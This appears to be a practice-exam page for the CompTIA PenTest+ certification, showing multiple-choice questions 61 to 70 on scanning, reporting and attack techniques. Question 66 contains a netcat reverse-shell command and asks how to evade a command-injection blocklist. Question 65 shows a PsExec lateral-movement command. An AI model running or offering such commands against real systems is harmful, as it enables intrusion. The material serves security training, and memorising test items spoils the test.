Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 7 out of 7 pages
Viewing questions 61-70 out of questions
Questions # 61:

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

Options:

A.

Risk analysis


B.

Peer review


C.

Root cause analysis


D.

Client acceptance


Expert Solution
Questions # 62:

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

Options:

A.

Censys.io


B.

Shodan


C.

Wayback Machine


D.

SpiderFoot


Expert Solution
Questions # 63:

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration


B.

URL spidering


C.

HTML scrapping


D.

DoS attack


Expert Solution
Questions # 64:

A penetration tester obtains the following output during an Nmap scan:

PORT STATE SERVICE

135/tcp open msrpc

445/tcp open microsoft-ds

1801/tcp open msmq

2103/tcp open msrpc

3389/tcp open ms-wbt-server

Which of the following should be the next step for the tester?

Options:

A.

Search for vulnerabilities on msrpc.


B.

Enumerate shares and search for vulnerabilities on the SMB service.


C.

Execute a brute-force attack against the Remote Desktop Services.


D.

Execute a new Nmap command to search for another port.


Expert Solution
Questions # 65:

While performing a penetration test, a tester executes the following command:

PS c:\tools> c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe


B.

Perform a lateral movement attack using PsExec


C.

Send the PsExec binary file to the server01 using cmd.exe


D.

Enable cmd.exe on the server01 through PsExec


Expert Solution
Questions # 66:

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}


B.

%0a


C.

+ *


D.

%20


Expert Solution
Questions # 67:

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = "/path/to/list.txt"

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended. Which of the following should the tester do to fix the script?

Options:

A.

Change line 2 to {"domain1", "domain2", "domain3", }.


B.

Change line 3 to while true; read -r i; do.


C.

Change line 4 to nikto $i | tee scan-$i.txt.


D.

Change line 5 to done < "$DOMAINS_LIST".


Expert Solution
Questions # 68:

Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done


B.

Keeping the report to a maximum of 5 to 10 pages in length


C.

Basing the recommendation on the risk score in the report


D.

Making the report clear for all objectives with a precise executive summary


Expert Solution
Questions # 69:

With one day left to complete the testing phase of an engagement, a penetration tester obtains the following results from an Nmap scan:

Not shown: 1670 closed ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.3 (CentOS)

3306/tcp open mysql MySQL (unauthorized)

8888/tcp open http lighttpd 1.4.32

Which of the following tools should the tester use to quickly identify a potential attack path?

Options:

A.

msfvenom


B.

SearchSploit


C.

sqlmap


D.

BeEF


Expert Solution
Questions # 70:

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports

Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts

Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts

Line 4: TCP RST received on ports 21, 3389, 80

Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered


B.

The wrong subnet was scanned


C.

Windows is using WSL


D.

IPS is blocking the ports


Expert Solution
Viewing page 7 out of 7 pages
Viewing questions 61-70 out of questions